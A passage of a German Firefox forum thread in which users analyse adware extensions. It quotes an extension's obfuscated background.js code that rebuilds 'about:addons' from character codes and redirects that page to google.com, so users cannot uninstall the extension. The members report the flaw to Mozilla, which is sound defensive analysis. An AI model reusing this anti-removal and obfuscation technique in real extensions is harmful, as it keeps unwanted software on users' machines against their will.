Die Script-Datei wiederum lädt scheinbar vor allem Werbung von cdnpps.us nach, aber ich habe mir die jetzt nicht intensiver angeschaut. Sprich: Das AddOn produziert zusätzliche Werbung auf den besuchten Seiten, womit der böse Bube also "nur" hinter Werbeeinnahmen her ist.
Greetz,
DF

Benutzeravatar
Zitronella
Senior-Mitglied
Beiträge: 9257
Registriert: Di, 07. Feb 2012 18:06

Re: seltsamer Code in Malware Erweiterung

#3

Beitrag von Zitronella Themen-Starter » Di, 17. Jul 2018 10:52

Vielen Dank für den Link und auch für die Erklärung was die Erweiterung macht.
Hilfe auch im deutschsprachigen Firefox-Chat möglich.
Meine Anleitungstexte dürfen gerne "geklaut" und weiter verwendet/kopiert werden ;)

Benutzeravatar
Zitronella
Senior-Mitglied
Beiträge: 9257
Registriert: Di, 07. Feb 2012 18:06

Re: seltsamer Code in Malware Erweiterung

#4

Beitrag von Zitronella Themen-Starter » Di, 17. Jul 2018 16:41

Das hier ist zwar gelöst. Aber ich hefte es trotzdem mal hier ran. Ich fand gerade eine Erweiterung, die verhindert, dass man about:addons aufrufen kann. Sobald man das macht, landet man auf google.com.
Ich frage mich wie das möglich sein kann :o Dachte so etwas wäre mit WebExtensions gar nicht möglich :-??
Somit gibts auch keinen Weg diese Erweiterung wieder zu deinstallieren (ok, gut händisch gehts natürlich oder auch mit Firefox zurücksetzen oder im SafeMode deinstallieren)
Zuletzt geändert von Zitronella am Di, 17. Jul 2018 22:01, insgesamt 2-mal geändert.
Hilfe auch im deutschsprachigen Firefox-Chat möglich.
Meine Anleitungstexte dürfen gerne "geklaut" und weiter verwendet/kopiert werden ;)

Benutzeravatar
Sören Hentzschel
Administrator
Beiträge: 18634
Registriert: Mi, 23. Nov 2011 0:39
Wohnort: Salzburg
Kontaktdaten:

Re: seltsamer Code in Malware Erweiterung

#5

Beitrag von Sören Hentzschel » Di, 17. Jul 2018 16:47

Das interessiert mich vom Code her, wie das umgesetzt ist. Magst du mir das die Erweiterung per PN senden?


Meine Beiträge zum Firefox-Quellcode (4 Beiträge; Letzter Beitrag: 05.09.2018)

Benutzeravatar
Zitronella
Senior-Mitglied
Beiträge: 9257
Registriert: Di, 07. Feb 2012 18:06

Re: seltsamer Code in Malware Erweiterung

#6

Beitrag von Zitronella Themen-Starter » Di, 17. Jul 2018 16:49

klar, gerne mache ich.
Hilfe auch im deutschsprachigen Firefox-Chat möglich.
Meine Anleitungstexte dürfen gerne "geklaut" und weiter verwendet/kopiert werden ;)

Benutzeravatar
DAUFahnder
Mitglied
Beiträge: 96
Registriert: So, 27. Mai 2018 4:02

Re: seltsamer Code in Malware Erweiterung

#7

Beitrag von DAUFahnder » Di, 17. Jul 2018 17:22

Zitronella hat geschrieben:
Di, 17. Jul 2018 16:49
klar, gerne mache ich.
An mich bitte auch. Der Hack müsste interessant sein.
Greetz,
DF

Benutzeravatar
madperson
Senior-Mitglied
Beiträge: 1830
Registriert: Sa, 17. Dez 2005 18:10

Re: seltsamer Code in Malware Erweiterung

#8

Beitrag von madperson » Di, 17. Jul 2018 17:50

bitte legt einen sicherheits-bugreport bei mozilla in der sache an...

EffPeh
Senior-Mitglied
Beiträge: 1570
Registriert: Mi, 04. Okt 2017 10:22

Re: seltsamer Code in Malware Erweiterung

#9

Beitrag von EffPeh » Di, 17. Jul 2018 18:08

Ich bin nur an euren Ergebnissen interessiert... :P
Windows 10 | FF 62.0 (64-Bit) / FF 61.0 (64-Bit) / FF 63.0 (64-Bit)

Benutzeravatar
Sören Hentzschel
Administrator
Beiträge: 18634
Registriert: Mi, 23. Nov 2011 0:39
Wohnort: Salzburg
Kontaktdaten:

Re: seltsamer Code in Malware Erweiterung

#10

Beitrag von Sören Hentzschel » Di, 17. Jul 2018 18:44

Dann werde ich mich nach dem Essen darum kümmern.


Meine Beiträge zum Firefox-Quellcode (4 Beiträge; Letzter Beitrag: 05.09.2018)

Benutzeravatar
DAUFahnder
Mitglied
Beiträge: 96
Registriert: So, 27. Mai 2018 4:02

Re: seltsamer Code in Malware Erweiterung

#11

Beitrag von DAUFahnder » Di, 17. Jul 2018 21:19

EffPeh hat geschrieben:
Di, 17. Jul 2018 18:08
Ich bin nur an euren Ergebnissen interessiert... :P
;)

Grundsätzlich macht das AddOn das Übliche: Es schickt Anwender auf eine andere Suchseite und verdient damit Geld, mehr nicht. Ja, lästig, aber für den Anwender im Grunde ungefährlich.

Nett ist aber das Abfangen von about:addons. Der Code dazu steckt in der background.js ganz am Ende:

Code: Alles auswählen

var tArr = [115, 100, 98, 116, 97, 100, 111, 117, 97, 111, 58, 110];
var tArrI = [8, 2, 6, 7, 3, 10, 4, 1, 5, 9, 11, 0];
var xtraRedirect = "";
for(var i=0; i<tArr.length; i++)
	xtraRedirect += String.fromCharCode(tArr[tArrI[i]]);
browser.tabs.onUpdated.addListener(function (tabId, changeInfo, tab) {
	if(changeInfo.url == xtraRedirect){
		browser.tabs.update(tabId, {url: "https://www.google.com/"});
	}
});
Das ist nicht dumm gemacht. Das Ding setzt einen EventListener, der dann auslöst wenn ein Tab aktualisiert wird. Dann vergleicht es die neue URL des "upgedateten" Tabs mit der Variable "xtraRedirect" und schickt den Anwender beim erfolgreichen Vergleich nach google indem es einfach die URL erneut aktualisiert.

Der Trick da ist jetzt, wie dieses "xtraRedirect" erstellt wird. Es wird "erzeugt". String.fromCharCode ist dazu gedacht, um Zugriff auf die Zeichen im Unicode-Standard zu bekommen. In diesem Beispiel erzeugt die Funktion "nur" den String "about:addons" und zieht ihn als Vergleich für die Tab-URL heran. Ich habe mal eine kleine HTML-Datei gebaut:

Code: Alles auswählen

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
	<head>
		<meta content="text/html; charset=utf-8" http-equiv="content-type">
    <title>Test</title>
	</head>
<body>

<script>
var tArr = [115, 100, 98, 116, 97, 100, 111, 117, 97, 111, 58, 110];
var tArrI = [8, 2, 6, 7, 3, 10, 4, 1, 5, 9, 11, 0];

var xtraRedirect = "";

for(var i=0; i<tArr.length; i++) {
	xtraRedirect += String.fromCharCode(tArr[tArrI[i]]);
  console.log (xtraRedirect);
  }
</script> 
</body>   
</html>
Obiges einfach als test.html speichern und im Firefox laden. In der Konsole (F12) kann man schön sehen, wie der String "about:addons" Zeichen für Zeichen zusammen gesetzt wird.

Nach meinem Verständnis sollte Firefox genau DAS eigentlich verhindern. Firefox darf durchaus das Event abfeuern, aber in dem Augenblick müsste er halt den Tab davor schützen, dass ein AddOn die URL verändert.

Sören, was sagst Du?
Greetz,
DF

Benutzeravatar
Zitronella
Senior-Mitglied
Beiträge: 9257
Registriert: Di, 07. Feb 2012 18:06

Re: seltsamer Code in Malware Erweiterung

#12

Beitrag von Zitronella Themen-Starter » Di, 17. Jul 2018 21:25

übrigens gerade gefunden, wo das schon mal beschrieben wurde https://support.mozilla.org/de/questions/1212497
Hilfe auch im deutschsprachigen Firefox-Chat möglich.
Meine Anleitungstexte dürfen gerne "geklaut" und weiter verwendet/kopiert werden ;)

Benutzeravatar
Sören Hentzschel
Administrator
Beiträge: 18634
Registriert: Mi, 23. Nov 2011 0:39
Wohnort: Salzburg
Kontaktdaten:

Re: seltsamer Code in Malware Erweiterung

#13

Beitrag von Sören Hentzschel » Di, 17. Jul 2018 21:25

WebExtensions sollten niemals about:addons, about:preferences, about:config und andere about:-Seiten blockieren dürfen. Das funktioniert für alle anderen about:-Seiten ebenfalls, das habe ich getestet. Das ist ja einer der wichtigsten Punkte von WebExtensions, dass Firefox-Interna besser geschützt sind.

Die Sache mit dem xtraRedirect dient übrigens nur der Verschleierung. Das habe ich auch getestet. Es funktioniert auch, wenn man about:addons im Klartext verwendet.

Ich habe es bereits an Mozilla gemeldet, aber eine Bugzilla-ID bringt an dieser Stelle nicht viel, da ich das Ticket nicht öffentlich erstellt habe, weil ich die fragliche Erweiterung dort ebenfalls angehängt habe.


Meine Beiträge zum Firefox-Quellcode (4 Beiträge; Letzter Beitrag: 05.09.2018)

EffPeh
Senior-Mitglied
Beiträge: 1570
Registriert: Mi, 04. Okt 2017 10:22

Re: seltsamer Code in Malware Erweiterung

#14

Beitrag von EffPeh » Di, 17. Jul 2018 21:35

Übles Ding. Ja, ich schätze, da muss Mozilla mal ran. Das kann man schon fast fahrlässig nennen, denn noch viel einfacher kann man es den Brüdern nicht mehr machen... :P
Windows 10 | FF 62.0 (64-Bit) / FF 61.0 (64-Bit) / FF 63.0 (64-Bit)

Benutzeravatar
DAUFahnder
Mitglied
Beiträge: 96
Registriert: So, 27. Mai 2018 4:02

Re: seltsamer Code in Malware Erweiterung

#15

Beitrag von DAUFahnder » Di, 17. Jul 2018 21:47

Sören Hentzschel hat geschrieben:
Di, 17. Jul 2018 21:25
WebExtensions sollten niemals about:addons, about:preferences, about:config und andere about:-Seiten blockieren dürfen.
So wie die Malware das macht dürfte das ja für alle Seiten klappen. Man könnte sich also z.B. eine PseudoURL für das eigene AddOn überlegen und die dann automatisch auf die Optionenseite oder sonst wo hinlenken... Das ermöglicht es z.B. in einem Hilfetext auf einer externen Seite einfach zu sagen "gib about:[addonname]" in die Adresszeile ein um die Optionen zu sehen. Oder gleich komplett a la

[addonname]:[gewünschteoptionsseite].

Sendet der Fuchs das Event auch bei Pseudo-URLs die er selbst gar nicht kennt? Und wenn er das macht, wie verhindert man, dass sich ein anderes AddOn dieses Event unter den Nagel reisst... schwierige Fragen :). Gute N8.
Greetz,
DF

Antworten

Wer ist online?

Mitglieder in diesem Forum: Exabot [Bot], Google [Bot] und 10 Gäste